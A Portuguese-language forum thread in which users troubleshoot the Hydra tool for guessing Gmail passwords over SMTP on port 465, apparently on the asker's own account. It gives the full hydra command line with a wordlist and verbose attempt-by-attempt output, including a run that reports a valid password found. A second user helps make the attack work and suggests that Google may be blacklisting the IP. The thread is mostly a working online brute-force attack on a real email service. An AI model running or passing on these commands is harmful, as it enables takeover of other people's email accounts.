Hydra - Kali linux

robertodiow
(usa Kali)

Enviado em 16/07/2015 - 19:46h

Não estou conseguindo ver a senha na minha wordlist, coloquei a senha nela mais mesmo assim não mostra como login no hydra, pode estar erado alguma coisa aqui.

# hydra -l Email@gmail.com -P /root/Desktop/gmail.lst -s 465 -S -v -V -t 1 smtp.gmail.com smtp

ele esta as senha mais a senha que eu coloquei no meu email não mostra como sucesso.

O que esta de errado que nao mostra a senha.

zhushazang
(usa Gentoo)

Enviado em 16/07/2015 - 20:03h

Se você utilizar os dados -l "user@domain" -p "senha", funciona?

Encobre os dados sensíveis e nos mostre a saída do comando, por favor.

Atenciosamente

---
Hail Hydra!

robertodiow
(usa Kali)

Enviado em 16/07/2015 - 20:17h

como assim não compreendi.

robertodiow
(usa Kali)

Enviado em 16/07/2015 - 20:35h

hydra -l email@gmail.com -P /root/Desktop/gmail.lst -s 465 -S -v -V -t 1 smtp.gmail.com smtp
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-07-16 20:33:38
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 1 task per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service smtp on port 465 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target smtp.gmail.com - login "email@gmail.com" - pass "wfeefw" - 1 of 6 [child 0]
[VERBOSE] using SMTP LOGIN AUTH mechanism
[ATTEMPT] target smtp.gmail.com - login "email@gmail.com" - pass "ergerg" - 2 of 6 [child 0]
[ATTEMPT] target smtp.gmail.com - login "email@gmail.com" - pass "regregre" - 3 of 6 [child 0]
[ATTEMPT] target smtp.gmail.com - login "email@gmail.com" - pass "senhacorreta" - 4 of 6 [child 0]
[ATTEMPT] target smtp.gmail.com - login "email@gmail.com" - pass "gbtybt" - 5 of 6 [child 0]
[ATTEMPT] target smtp.gmail.com - login "email@gmail.com" - pass "hythyt" - 6 of 6 [child 0]
[STATUS] attack finished for smtp.gmail.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found

zhushazang
(usa Gentoo)

Enviado em 16/07/2015 - 22:48h

Rapaz, refiz aqui o que você fez e a única coisa que me ocorre é que sua senha é muito óbvia para o google e ele nega autenticação com ela. Outra coisa, não sei quantas tentativas você fez contra o host a partir do mesmo ip. Pode ser que seu ip tenha caído em alguma blacklist do google. Suposições apenas.

Tente colocar uma senha randômica com o pwgen e testar amanhã.

Veja que no meu teste ele simplesmente termina a execução:

hydra -l "meulogin" -P senhas.txt -s 465 -S -v -V -t 1 smtp.gmail.com smtp                                                                                              

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.



Hydra (http://www.thc.org/thc-hydra) starting at 2015-07-16 21:41:11

[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!

[DATA] max 1 task per 1 server, overall 64 tasks, 7 login tries (l:1/p:7), ~0 tries per task

[DATA] attacking service smtp on port 465 with SSL

[VERBOSE] Resolving addresses ... done

[ATTEMPT] target smtp.gmail.com - login "meulogin" - pass "wfeefw" - 1 of 7 [child 0]

[VERBOSE] using SMTP LOGIN AUTH mechanism

[ATTEMPT] target smtp.gmail.com - login "meulogin" - pass "ergerg" - 2 of 7 [child 0]

[ATTEMPT] target smtp.gmail.com - login "meulogin" - pass "regregre" - 3 of 7 [child 0]

[ATTEMPT] target smtp.gmail.com - login "meulogin" - pass "senhacorreta" - 4 of 7 [child 0]

[ATTEMPT] target smtp.gmail.com - login "meulogin" - pass "minhasenha" - 5 of 7 [child 0]

[465][smtp] host: smtp.gmail.com   login: meulogin   password: minhasenha

[STATUS] attack finished for smtp.gmail.com (waiting for children to complete tests)

1 of 1 target successfully completed, 1 valid password found

Hydra (http://www.thc.org/thc-hydra) finished at 2015-07-16 21:41:22

 

---
Hail Hydra!